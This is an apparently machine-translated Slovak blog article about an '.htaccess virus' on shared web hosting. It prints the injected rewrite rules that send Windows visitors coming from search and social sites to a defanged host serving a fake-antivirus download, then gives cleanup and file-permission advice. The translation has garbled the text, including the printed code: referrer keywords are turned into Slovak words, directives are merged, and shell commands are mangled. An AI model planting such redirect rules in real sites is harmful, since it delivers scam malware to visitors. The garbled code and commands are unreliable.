Nová forma vírusu o ktorom vidím, že sa toho veľa nevie, ovplyvňuje stránky hostované na nespoľahlivé servery kde môžu používateľské účty / účty subdomény “pozri” medzi nimi. Presnejšie povedané, všetky hostingové účty sú umiestnené v priečinku “vhosts“a autorské práva na užívateľský priečinok Od “vhosts” poskytuje sa bežnému používateľovi… predajcu vo väčšine situácií. Je to typická metóda webových serverov, ktoré nepoužívajú WHM/cPanel.
spokojnosť
Pôsobenie vírusu .htaccess – .htaccess Hack
vírus ovplyvniť súbory .htaccess miesta obete. Pridávajú sa riadky / smernice do ktorej presmerovať návštevníkov (pochádzajú z yahoo, msn, google, facebook, yaindex, twitter, myspace atď. stránok a portálov s vysokou návštevnosťou) na niektoré stránky, ktoré ponúkajú “antivírusové riešenia“. Ide o falošné antivírusové riešenia, o ktorej som písal v úvode z r Falošný antivírusový odstraňovač.
Takto jeden vyzerá .htaccess postihnuté: (nepristupujte k URL v obsahu riadkov nižšie)
ErrorDocument 500 hxxp://www.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://www.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3Prepisovať
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
rewritecond %{http_referer} .*wikipedia.*$ [nc,or]
RewriteCond %{HTTP_REFERER} .*bloger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*naživo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dvojité kliknutie.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*spýtať sa.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vzrušovať.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://www.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://www.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]
Tí, ktorí používajú WordPress, nájdu tieto riadky v súbore .htaccess Od public_html. Okrem toho vírus vytvorí v priečinku identický .htaccess wp-obsah.
*Sú aj situácie, keď sa namiesto peoriavascularsurgery.com objaví dns.thesoulfoodcafe.com alebo iné adresy.
Čo robí tento vírus?
Po presmerovaní je návštevník privítaný s otvorenou náručou správou:
POZOR!
Váš počítač obsahuje rôzne známky prítomnosti vírusov a škodlivých programov. Váš systém vyžaduje okamžitú antivírusovú kontrolu!
Zabezpečenie systému vykoná rýchlu a bezplatnú kontrolu vášho počítača na prítomnosť vírusov a škodlivých programov.
Bez ohľadu na to, ktoré tlačidlo stlačíme, prejdeme na stránku “Môj počítač“, vytvorený na napodobňovanie dizajn XP. Tu sa to spustí automaticky “proces skenovania”, na konci ktorého zisťujeme, že “sme infikovaní”.
Po stlačení OK alebo Zrušiť sa spustí stiahnutiesúboru setup.exe. Toto setup.exe je falošný antivírus čo ovplyvňuje systém. Nainštaluje sériu malvérových aplikácií, ktoré budú ďalej šíriť infikované odkazy a okrem toho a softvérový antivírus (tiež falošné), ktoré je obeť vyzvaná kúpiť.
Tí, ktorí už túto formu vírusu kontaktovali, ju môžu použiť Falošný antivírusový odstraňovač. Odporúča sa tiež skenovať celý HDD. odporučiť Zabezpečenie internetu Kaspersky alebo Kaspersky Anti Virus.
Táto forma vírusu ovplyvňuje operačné systémy návštevníkov s operačnými systémami Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 a Windows 95. Doteraz nie sú známe žiadne prípady infekcie operačných systémov Windows Vista a Windows 7.
Ako môžeme odstrániť tento vírus .htaccess zo servera a ako môžeme zabrániť infekcii.
1. Analýza súborov a vymazanie podozrivých kódov. Aby ste sa uistili, že nie je ovplyvnený iba súbor .htaccess je to dobré analyzujeme všetky súbory .php a .js.
2. Súbor .htaccess prepíšeme a nastavíme chmod 644 alebo 744 len s právami na zápis užívateľ-ul vlastník.
3. Pri vytváraní hostiteľského účtu pre lokalitu v priečinku /domov alebo /webroot automaticky sa vytvorí priečinok, ktorý má zvyčajne meno používateľa (užívateľ pre cpanel, ftp, atď.). Aby sa predišlo zapisovaniu údajov a prenosu vírusov z jedného používateľa na druhého, odporúča sa v každom používateľskom priečinku nastaviť:
Chmod 644 Sau 744, 755 – uvedené je 644.
chown -R nume_user nume_folder.
chgrp -R nume_user nume_folder
ls -všetko skontrolujte, či sú režimy nastavené správne. Malo by sa objaviť niečo takéto:
drwx–x–x 12 dinamics dinamics 4096 6. máj 14:51 dinamics/
drwx–x–x 10 duran duran 4096 7. marec 07:46 duran/
drwx–x–x 12 skúmaviek skúmavky 4096 29. január 11:23 skúmavky/
drwxr-xr-x 14 expresný expresný 4096 26. február 2009 expresný/
drwxr-xr-x 9 tie tie 4096 19. máj 01:09 tie/
drwx–x–x 9 farma farma 4096 19. december 22:29 farma/
Ak jeden z vyššie uvedených používateľov bude mať FTP infikované súbory, nebude môcť poslať vírus inému hosťovanému používateľovi. Ide o minimálne bezpečnostné opatrenie na ochranu účtov hosťovaných na webovom serveri.
Bežné prvky domén ovplyvnených týmto typom vírusu.
Všetky dotknuté domény presmerujú návštevníkov na stránky, ktoré obsahujú názov domény “/main.php?e=4&h“.
Tak “vírus de .htaccess” ovplyvňuje akýkoľvek typ CMS (Joomla, WordPress, phpBBatď.), ktorý používa .htaccess.
.htaccess Virus Hack & Presmerovať.
